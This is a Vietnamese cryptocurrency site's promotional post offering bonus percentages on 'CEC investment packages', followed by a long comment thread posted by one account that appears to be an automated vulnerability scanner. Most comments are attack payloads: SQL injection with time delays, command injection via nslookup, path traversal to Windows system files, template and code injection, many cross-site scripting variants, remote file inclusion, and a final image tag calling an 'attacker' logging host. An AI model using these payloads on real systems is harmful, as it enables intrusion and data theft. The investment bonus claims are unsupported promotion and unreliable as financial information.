THAM GIA GÓI ĐẦU TƯ CEC - NHẬN NGAY ƯU ĐÃI

11/07/2019 - huy
2553
201
 
Trong tháng 07, khi khách hàng tham gia Gói đầu tư CEC sẽ được tặng thêm % gói đầu tư bằng CEC Bonus. Cụ thể như sau:

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 90 ngày sẽ được tặng thêm 1%/gói bằng CEC Bonus.

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 180 ngày sẽ được tặng thêm 3%/gói bằng CEC Bonus.

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 360 ngày sẽ được tặng thêm 5%/gói bằng CEC Bonus.

 

Chúng tôi sẽ tiến hành tặng thưởng % CEC Bonus cho những khách hàng tham gia vào Gói đầu tư CEC vào ngày 05.08.2019.

 

➡️Chi tiết về các gói đầu tư: https://blog.coinextra.net/coinextra-cac-goi-dau-tu-cec.html

 

Nếu có bất cứ thắc mắc nào vui lòng liên hệ trực tiếp với đội ngũ Support của chúng tôi hoặc gửi về email: Support@coinextra.net.
 

 

CoinExtra Team
Leave your comment
Comments
rwejbolu
rwejbolu
30/08/2019 14:21

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

set|set&set

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

$(nslookup K5yLufta)

rwejbolu
rwejbolu
30/08/2019 15:59

&nslookup NQuFn4RN&'\"`0&nslookup NQuFn4RN&`'

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 15:59

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

qAaBeTxN

rwejbolu
rwejbolu
30/08/2019 16:00

${10000009+10000376}

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

response.write(9713586*9001659)

rwejbolu
rwejbolu
30/08/2019 16:00

'+response.write(9713586*9001659)+'

rwejbolu
rwejbolu
30/08/2019 16:00

"+response.write(9713586*9001659)+"

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1&n971153=v966417

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rwejbolu
rwejbolu
30/08/2019 16:00

12345'"\'\");|]*{
<>�''💩

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1some_inexistent_file_with_long_name.jpg

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

Http://testasp.vulnweb.com/t/fit.txt

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

'"()

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

http://testasp.vulnweb.com/t/fit.txt?.jpg

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

testasp.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

http://hitrs6la1Gwvs.bxss.me/

rwejbolu
rwejbolu
30/08/2019 16:00

tham-gia-goi-dau-tu-cec-nhan-ngay-uu-dai.html

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

tham-gia-goi-dau-tu-cec-nhan-ngay-uu-dai.html

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

tham-gia-goi-dau-tu-cec-nhan-ngay-uu-dai.html/.

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

../../../../../../../../../../windows/win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

/www.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

C:\WINDOWS\system32\drivers\etc\hosts

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

../../../../../../../../../../windows/win.ini.jpg

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

������������������������������������������������windows��win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

................windowswin.ini

rwejbolu
rwejbolu
30/08/2019 16:00

'"

rwejbolu
rwejbolu
30/08/2019 16:00

..\..\..\..\..\..\..\..\windows\win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

1'"

rwejbolu
rwejbolu
30/08/2019 16:00

\

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

rwejbolu
rwejbolu
30/08/2019 16:00

<!--

rwejbolu
rwejbolu
30/08/2019 16:00

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

Dk8NhK3C

rwejbolu
rwejbolu
30/08/2019 16:00

1����%2527%2522

rwejbolu
rwejbolu
30/08/2019 16:00

-1 OR 2+225-225-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 16:00

@@RMPSh

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

JyI=

rwejbolu
rwejbolu
30/08/2019 16:00

-1 OR 2+794-794-1=0+0+0+1

rwejbolu
rwejbolu
30/08/2019 16:00

�'�"

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

-1' OR 2+115-115-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 16:00

�''�""

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

WEB-INF/web.xml

rwejbolu
rwejbolu
30/08/2019 16:00

WEB-INF\web.xml

rwejbolu
rwejbolu
30/08/2019 16:00

-1' OR 2+538-538-1=0+0+0+1 or 'kDGGyoaE'='

rwejbolu
rwejbolu
30/08/2019 16:00

1

rwejbolu
rwejbolu
30/08/2019 16:00

)

rwejbolu
rwejbolu
30/08/2019 16:00

1'"()&%<acx><ScRiPt >XKFg(9217)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:00

!(()&&!|*|*|

rwejbolu
rwejbolu
30/08/2019 16:00

-1" OR 2+685-685-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 16:00

^(#$!@#$)(()))******

rwejbolu
rwejbolu
30/08/2019 16:00

if(now()=sysdate(),sleep(13),0)/*'XOR(if(now()=sysdate(),sleep(13),0))OR'"XOR(if(now()=sysdate(),sleep(13),0))OR"*/

rwejbolu
rwejbolu
30/08/2019 16:00

(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'"+(select(0)from(select(sleep(13)))v)+"*/

rwejbolu
rwejbolu
30/08/2019 16:00

;print(md5(acunetix_wvs_security_test));

rwejbolu
rwejbolu
30/08/2019 16:00

'"()&%<acx><ScRiPt >XKFg(9577)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:00

';print(md5(acunetix_wvs_security_test));$a='

rwejbolu
rwejbolu
30/08/2019 16:00

";print(md5(acunetix_wvs_security_test));$a="

rwejbolu
rwejbolu
30/08/2019 16:00

${@print(md5(acunetix_wvs_security_test))}

rwejbolu
rwejbolu
30/08/2019 16:00

-1; waitfor delay '0:0:13' --

rwejbolu
rwejbolu
30/08/2019 16:00

-1); waitfor delay '0:0:13' --

rwejbolu
rwejbolu
30/08/2019 16:01

${@print(md5(acunetix_wvs_security_test))}\

rwejbolu
rwejbolu
30/08/2019 16:01

-1)); waitfor delay '0:0:4' --

rwejbolu
rwejbolu
30/08/2019 16:01

19735919

rwejbolu
rwejbolu
30/08/2019 16:01

acu6114<s1﹥s2ʺs3ʹuca6114

rwejbolu
rwejbolu
30/08/2019 16:01

-1)); waitfor delay '0:0:0' --

rwejbolu
rwejbolu
30/08/2019 16:01

1 waitfor delay '0:0:4' --

rwejbolu
rwejbolu
30/08/2019 16:01

XAArQkZ7'; waitfor delay '0:0:4' --

rwejbolu
rwejbolu
30/08/2019 16:01

acux5783��z1��z2a�bcxuca5783

rwejbolu
rwejbolu
30/08/2019 16:01

9UkiJozU'); waitfor delay '0:0:4' --

rwejbolu
rwejbolu
30/08/2019 16:01

Q3taFvDp'); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 16:01

SWK3fb6D')); waitfor delay '0:0:4' --

rwejbolu
rwejbolu
30/08/2019 16:01

-1;select pg_sleep(4); --

rwejbolu
rwejbolu
30/08/2019 16:01

-1);select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 16:01

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

rwejbolu
rwejbolu
30/08/2019 16:01

-1));select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 16:01

{{10000063*10000016}}

rwejbolu
rwejbolu
30/08/2019 16:01

-1));select pg_sleep(0); --

rwejbolu
rwejbolu
30/08/2019 16:01

1<ScRiPt >XKFg(9430)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:01

-1));select pg_sleep(4); --

rwejbolu
rwejbolu
30/08/2019 16:01

-1));select pg_sleep(13); --

rwejbolu
rwejbolu
30/08/2019 16:01

sO7MubAH';select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 16:01

1<WG6UXR>GAJGN[!+!]</WG6UXR>

rwejbolu
rwejbolu
30/08/2019 16:01

VykPA61q');select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 16:01

RRrOsqey'));select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 16:01

274'

rwejbolu
rwejbolu
30/08/2019 16:01

1

rwejbolu
rwejbolu
30/08/2019 16:01

1

rwejbolu
rwejbolu
30/08/2019 16:02

1<script>XKFg(9985)</script>

rwejbolu
rwejbolu
30/08/2019 16:02

1<ScR<ScRiPt>IpT>XKFg(9187)</sCr<ScRiPt>IpT>

rwejbolu
rwejbolu
30/08/2019 16:02

1<ScRiPt
>XKFg(9503)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:02

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9761></ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:02

1<ScRiPt
>XKFg(9492)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:02

1<video><source onerror="javascript:XKFg(9643)">

rwejbolu
rwejbolu
30/08/2019 16:02

1<svg  

�onload=XKFg(9917);>

rwejbolu
rwejbolu
30/08/2019 16:02

1<isindex type=image src=1 onerror=XKFg(9786)>

rwejbolu
rwejbolu
30/08/2019 16:02

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9884'>

rwejbolu
rwejbolu
30/08/2019 16:02

1<body onload=XKFg(9378)>

rwejbolu
rwejbolu
30/08/2019 16:02

1<img src=//testasp.vulnweb.com/t/dot.gif onload=XKFg(9456)>

rwejbolu
rwejbolu
30/08/2019 16:02

1<img src=xyz OnErRor=XKFg(9209)>

rwejbolu
rwejbolu
30/08/2019 16:02

1<img/src=">" onerror=alert(9064)>

rwejbolu
rwejbolu
30/08/2019 16:02

%31%3C%53%63%52%69%50%74%20%3E%58%4B%46%67%289814%29%3C%2F%73%43%72%69%70%54%3E

rwejbolu
rwejbolu
30/08/2019 16:02

1\u003CScRiPt\XKFg(9711)\u003C/sCripT\u003E

rwejbolu
rwejbolu
30/08/2019 16:02

1&lt;ScRiPt&gt;XKFg(9920)&lt;/sCripT&gt;

rwejbolu
rwejbolu
30/08/2019 16:02

�<img acu onmouseover=XKFg(9453) //�>

rwejbolu
rwejbolu
30/08/2019 16:02

1<input autofocus onfocus=XKFg(9020)>

rwejbolu
rwejbolu
30/08/2019 16:02

<a HrEF=http://www.vulnweb.com></a>

rwejbolu
rwejbolu
30/08/2019 16:02

<a HrEF=jaVaScRiPT:>

rwejbolu
rwejbolu
30/08/2019 16:03

[url=http://www.vulnweb.com][/url]

rwejbolu
rwejbolu
30/08/2019 16:03

1<img<!-- --> src=x onerror=alert(9402);//><!-- -->

rwejbolu
rwejbolu
30/08/2019 16:03

1}body{acu:Expre/**/SSion(XKFg(9980))}

rwejbolu
rwejbolu
30/08/2019 16:03

1<% contenteditable onresize=XKFg(9734)>

rwejbolu
rwejbolu
30/08/2019 16:03

1oFhos
<ScRiPt >XKFg(9160)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 16:03

1<WWKJ7M>RBEDL[!+!]</WWKJ7M>

rwejbolu
rwejbolu
30/08/2019 16:03

1<ifRAme sRc=9408.com></IfRamE>

rwejbolu
rwejbolu
30/08/2019 16:03

1<9NdW8h x=9794>

rwejbolu
rwejbolu
30/08/2019 16:03

1<img sRc='http://attacker-9658/log.php?